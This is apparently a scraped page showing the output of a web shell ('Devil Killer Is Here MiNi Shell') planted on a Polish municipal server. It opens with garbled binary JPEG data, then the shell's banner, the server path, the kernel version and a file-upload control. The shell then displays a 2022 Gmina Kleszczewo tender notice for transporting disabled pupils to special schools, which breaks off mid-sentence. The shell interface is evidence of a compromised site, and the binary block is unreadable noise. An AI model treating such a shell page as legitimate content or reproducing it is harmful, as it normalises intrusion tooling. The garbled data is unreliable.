JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220720/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220720/0026872401-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Dowóz uczniów niepełnosprawnych z Gminy Kleszczewo do szkół specjalnych <br/>w roku szkolnym 2022/2023 wraz z opieką </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Kleszczewo</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 631258715</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Poznańska 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kleszczewo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">63-005</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL418 - Poznański</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">61 817 60 17</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@kleszczewo.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.kleszczewo.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dowóz uczniów niepełnosprawnych z Gminy Kleszczewo do szkół specjalnych <br/>w roku szkolnym 2022/2023 wraz z opieką </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-77c433d5-07e7-11ed-8000-d680d39e541a</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00268724</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-07-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00052545/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Dowóz uczniów niepełnosprawnych z gminy Kleszczewo do szkół w roku szkolnym 2022/2023</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/kleszczewo <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Postępowanie prowadzone jest w<br/>języku polskim za pośrednictwem platformazakupowa.pl pod adresem:<br/>https://platformazakupowa.pl/pn/kleszczewo. Komunikacja między Zamawiającym a Wykonawcami<br/>odbywa się za pośrednictwem platformazakupowa.pl i formularza „Wyślij wiadomość do<br/>zamawiającego”.<br/>Zamawiający dopuszcza, opcjonalnie, komunikację za pośrednictwem poczty elektronicznej. Adres<br/>poczty el. osoby uprawnionej do kontaktu z Wykonawcami: urzad@kleszczewo.pl.<br/>3. Zamawiający będzie przekazywał Wykonawcom informacje za pośrednictwem<br/>platformazakupowa.pl. Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany<br/>terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji<br/>“Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny<br/>wykonawca, będzie przekazywana za pośrednictwem platformazakupowa.pl do konkretnego<br/>wykonawcy.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">− stały<br/>dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>− komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2<br/>GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux,<br/>lub ich nowsze wersje,<br/>− zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja<br/>10.0,<br/>− włączona obsługa JavaScript,<br/>− zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>− Szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.<br/>− Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas<br/>(hh:mm:ss) generowany wg czasu lokalnego serwera synchronizowanego z zegarem Głównego<br/>Urzędu Miar.<br/>6. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>− akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej pod linkiem w zakładce „Regulamin&#34; oraz uznaje go za wiążący,<br/>− zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod linkiem.<br/>7. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją<br/>korzystania z platformazakupowa.pl, w szczególności za sytuację, gdy Zamawiający zapozna się z<br/>treścią oferty przed upływem terminu składania ofert (np. złożenie oferty w zakładce „Wyślij wiadomość<br/>do zamawiającego”).<br/>Taka oferta zostanie uznana przez Zamawiającego za ofertę handlową i nie będzie brana pod uwagę w<br/>przedmiotowym postępowaniu, ponieważ nie został spełniony obowiązek narzucony w art. 221 Ustawy<br/>Prawo Zamówień Publicznych.<br/>8. Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące w<br/>szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych<br/>czynności podejmowanych w niniejszym postępowaniu przy użyciu platformazakupowa.pl znajdują się<br/>w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje 9. Zamawiający nie przewiduje sposobu<br/>komunikowania się z Wykonawcami w inny sposób niż przy<br/>użyciu środków komunikacji elektronicznej, wskazanej w SWZ.<br/>Oferta, wniosek oraz przedmiotowe środki dowodowe (jeżeli były wymagane) składane elektronicznie<br/>muszą zostać podpisane elektronicznym podpisem kwalifikowanym lub elektronicznym podpisem<br/>zaufanym lub elektronicznym podpisem osobistym (e-dowód). W procesie składania oferty, wniosku, w<br/>tym przedmiotowych środków dowodowych na platformie, kwalifikowany podpis elektroniczny lub<br/>podpis zaufany lub podpis osobisty Wykonawca składa bezpośrednio na dokumencie, który następnie<br/>przesyła do systemu. Maksymalny rozmiar jednego pliku przesyłanego za pośrednictwem<br/>dedykowanych formularzy do złożenia oferty wynosi 150 MB, natomiast przy komunikacji wielkość pliku<br/>to maksymalnie 500 MB.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1. Administratorem Pani/Pana danych osobowych jest: Urząd Gmina Kleszczewo w osobie Wójta<br/>Gminy Kleszczewo, ul. Poznańska 4, 63-005 Kleszczewo, mail: urzad@kleszczewo.pl, tel.: 061 817 60<br/>17.<br/>2. W sprawach związanych z ochroną danych osobowych można kontaktować się z Inspektorem<br/>Ochrony Danych pod adresem e-mail: iod@kleszczewo.pl oraz na adres siedziby: 63-005 Kleszczewo<br/>przy ul. Poznańska 4.<br/>3. Państwa dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym<br/>z postępowaniem o udzielenie zamówienia publicznego na „Dowóz uczniów niepełnosprawnych z<br/>Gminy Kleszczewo do szkół specjalnych<br/>4. w roku szkolnym 2022/2023 wraz z opieką” prowadzonym w trybie podstawowym, na podstawie art.<br/>275 pkt 1 ustawy pzp oraz zawarcia umowy.<br/>5. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Prawo zamówień publicznych.<br/>Państwa dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat<br/>od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4<br/>lata, okres przechowywania obejmuje cały czas trwania umowy.<br/>6. Posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących; b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych ;<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO .<br/>Nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Państwa danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>7. Obowiązek podania przez Pani/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp.<br/>8. Pani/Pana dane osobowe nie będą przekazywane poza terytorium Europejskiego Obszaru<br/>Gospodarczego/do organizacji międzynarodowej.<br/>9. Pani/Pana dane nie będą podlegały zautomatyzowanemu podejmowaniu decyzji, w tym również<br/>profilowaniu.<br/>10. Ma Pan/Pani prawo wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych ul. Stawki<br/>2, 00-193 Warszawa, gdy uzna Pani/Pan, iż przetwarzanie Pani/Pana danych osobowych narusza<br/>przepisy Rozporządzenia</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.7.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest świadczenie usług transportowych w zakresie przewozu niepełnosprawnych dzieci z miejsca zamieszkania do szkoły/placówki oświatowej i z powrotem, w dniach w których odbywają się nauki szkolne tj. kiedy odbywają się zajęcia edukacyjne, wychowawcze, opiekuńcze lub uroczystości szkolne, zgodnie z kalendarzem roku szkolnego, wraz z zapewnieniem wykwalifikowanej opieki w czasie transportu.<br/><br/>2.	Miejscami docelowymi dowożonych uczniów są:<br/>a)	Zespół Szkół Specjalnych Nr 102 w Poznaniu, ul. Przełajowa 6;<br/>b)	Zespół Szkół Specjalnych Nr 103 w Poznaniu, ul. Rycerska 43;<br/>c)	Zespół Szkół Specjalnych Nr 101 w Poznaniu, ul. Swobody 41;<br/>d)	Szkoła Specjalna nr 107, ul. Dąbrowskiego 73 Poznań;<br/>e)	Zespół Szkól Specjalnych Nr 105 w Poznaniu ul. Nieszawska 21;<br/>f)	Szkoła Podstawowa nr 6 w Poznaniu, os. Rusa 56<br/>g)	Przedszkole nr73 Zielony Zakątek Os. Czecha 140 61-292 Poznań<br/>Zamawiający zastrzega możliwość zmiany miejsc docelowych wymienionych powyżej.<br/>3.	Czas przebywania uczniów w samochodzie podczas dowozu do szkoły bądź ze szkoły do domu nie może przekraczać 1,5 godziny. Dziecko nie może zostać przywiezione do szkoły wcześniej niż na 45-60 minut przed rozpoczęciem zajęć. W roku szkolnym 2022/2023 szacuje się ok. 12-16 dowożonych uczniów niepełnosprawnych.<br/>4.	Wykonawca musi dysponować min. 2 samochodami z kierowcą - o ilości miejsc siedzących 10-14+1 lub 19+1 każdy, wyposażone w pasy bezpieczeństwa. W każdym samochodzie musi znajdować się jeden opiekun dla dzieci mający pieczę nad nimi zarówno w czasie jazdy, jak i przy wsiadaniu i wysiadaniu z pojazdów.<br/>5.	Pojazdy służące do przewozów muszą posiadać aktualne badania techniczne. Na każdy dzień tygodnia zostanie określona trasa, która w trakcie realizacji usłu ust. 1 pkt. 1.4gi może być modyfikowana w zależności od potrzeb Zamawiającego lub na wniosek Wykonawcy usługi. W trakcie trwania ferii, świąt lub innych dni wyznaczonych przez dyrekcje placówek oświatowych, jako wolne od zajęć, przewozy nie będą się odbywały. W razie zaistnienia konieczności dowozu dzieci w dni dodatkowe lub na innych dodatkowych trasach oferent zobowiązuje się do ich realizacji w ramach zawartej umowy.<br/>6.	Pojazdy użyte przez Wykonawcę do przewozu dzieci muszą także posiadać pasy bezpieczeństwa i spełniać następujące wymagania:<br/>− pojazdy muszą być objęte aktualnym, pełnym ubezpieczeniem (OC, AC, NW dla pasażerów),<br/>− pojazdy muszą być odpowiednio oznakowane,<br/>− pojazdy muszą być sprawne pod względem technicznym,<br/>− dopuszczone do ruchu drogowego i posiadać aktualne badania techniczne,<br/>− w pojazdach muszą być zapewnione właściwe warunki bezpieczeństwa i higieny.<br/>7.	Przewozy mogą odbywać się wyłącznie pojazdami zapewniającymi miejsca siedzące dla wszystkich przewożonych uczniów. Pojazdy muszą spełniać wymogi bezpieczeństwa i warunki techniczne określone odrębnymi przepisami.<br/>8.	W przypadku awarii samochodu lub braku zdolności do świadczenia usług przez wskazanego w ofercie kierowcę lub opiekuna, Wykonawca jest zobowiązany we własnym zakresie zapewnić zastępstwo tych osób lub podstawić samochód zastępczy.<br/>9.	Zamawiający wymaga bezwzględnie aby w czasie każdego kursu w pojeździe znajdował się opiekun, który będzie czuwał nad bezpieczeństwem dzieci w czasie przewozu. <br/>10.	Opiekunem dowożonych dzieci musi być osoba pełnoletnia, przygotowana do wykonywania podstawowych czynności pielęgnacyjno-opiekuńczych, posiadająca przeszkolenie lub kurs w zakresie udzielania pierwszej pomocy przedmedycznej, udokumentowane certyfikatem, świadectwem lub innym dokumentem potwierdzającym ukończenie szkolenia, formy doskonalenia lub uzyskania kwalifikacji.<br/>11.	Pod pojęciem opieka rozumie się zapewnienie warunków bezpieczeństwa i higieny w trakcie wsiadania, wysiadania i przejazdu uczniów, która jest niezbędna przy tego rodzaju przewozach. Obowiązek sprawowania opieki nad dziećmi następuje w momencie wejścia dziecka do pojazdu (odebranie dziecka od rodziców w miejscu wsiadania i przekazania pracownikowi szkoły/placówki (analogicznie w drodze powrotnej)<br/>12.	Zamawiający przewiduje, że przez cały okres świadczenia usługi przewozowej łączna długość trasy wyniesie ok. 130 000 km. Faktury za świadczoną usługę rozliczane będą miesięcznie według rzeczywiście przejechanych kilometrów z dziećmi (wraz z opieką), to jest od pierwszego do ostatniego dziecka.<br/>13.	W roku szkolnym 2022/2023, zgodnie z kalendarzem roku szkolnego ustalonym przez Ministerstwo Edukacji Narodowej, przewiduje się maksymalnie 187 dni nauki szkolnej.<br/><br/>14.	Zamawiający zastrzega sobie prawo:<br/>a)	zmniejszenia, bądź zwiększenia zakresu usług, przyjmując do rozliczeń ceny jednostkowe za każdy przejechany 1km o maksymalnie 20% wartości umowy;<br/>b)	natychmiastowego rozwiązania umowy o wykonanie usługi w przypadku nienależytego wykonania umowy w ocenie Zamawiającego, polegającego między innymi na :<br/>- opóźnieniu w przewozach dzieci powyżej 30 minut,<br/>- nieprzestrzeganiu harmonogramu dowozów,<br/>- utrzymywaniu pojazdów w niewłaściwym stanie technicznym,<br/>- utrzymywaniu pojazdów w nienależytej czystości i niewłaściwym zachowaniu się kierowcy i opiekuna w stosunku do pasażerów,<br/><br/>15.	Wszystkie koszty związane z realizacją zamówienia Wykonawca jest zobowiązany ująć w cenie ofertowej. Do obliczenia ceny ofertowej brutto Wykonawca przyjmuje stawkę podatku VAT 8% . </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje udzielenie zamówień polegających na powtórzeniu<br/>podobnych robót budowlanych w oparciu o art. 214 ust. 1 pkt. 7 ustawy pzp, do wysokości 30%<br/>wartości zamówienia podstawowego i zgodnych z przedmiotem tego zamówienia. Zamówienie będzie<br/>mogło być udzielone w przypadku, gdy Zamawiający będzie dysponował środkami na jego realizację i<br/>na warunkach zgodnych z zamówieniem podstawowym.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas podstawienia pojazdu zastępczego w przypadku awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 5.4.) Nazwa i opis warunków udziału w postępowaniu.<br/>1.1. zdolności do występowania w obrocie gospodarczym - nie dotyczy (Zamawiający w tym<br/>zakresie nie wprowadza żadnych ograniczeń).<br/>1.2. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile<br/>wynika to z odrębnych przepisów - do wykonywania działalności lub czynności, związanych z<br/>realizacją przedmiotu zamówienia- Zamawiający wymaga posiadania przez Wykonawcę<br/>aktualnej licencji na wykonywanie krajowego transportu drogowego w zakresie przewozu osób<br/>na terenie Polski.<br/>1.3. sytuacji ekonomicznej lub finansowej - pozwalającej na realizację przedmiotu zamówienia<br/>Zamawiający wymaga, aby Wykonawca posiadał polisę lub inny dokument ubezpieczenia<br/>potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie<br/>prowadzonej działalności gospodarczej, zgodnie z przedmiotem zamówienia na kwotę minimum<br/>100.000zł.<br/>1.4. zdolności technicznej lub zawodowej:<br/>1.4.1. Zamawiający wymaga, aby Wykonawca w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia<br/>działalności jest krótszy - w tym okresie, wykonał z należytą starannością co najmniej jedno<br/>zamówienie o charakterze i złożoności porównywalnej z zakresem zamówienia, na które<br/>Wykonawca składa ofertę w zakresie przewozu uczniów niepełnosprawnych i o wartości min 150<br/>000 zł brutto oraz dysponuje odpowiednimi referencjami lub innymi dokumentami<br/>potwierdzającymi, że usługi te zostały wykonane lub są wykonywane należycie.<br/>1.4.2. Zamawiający wymaga, aby Wykonawca dysponował min. 2 samochodami o ilości 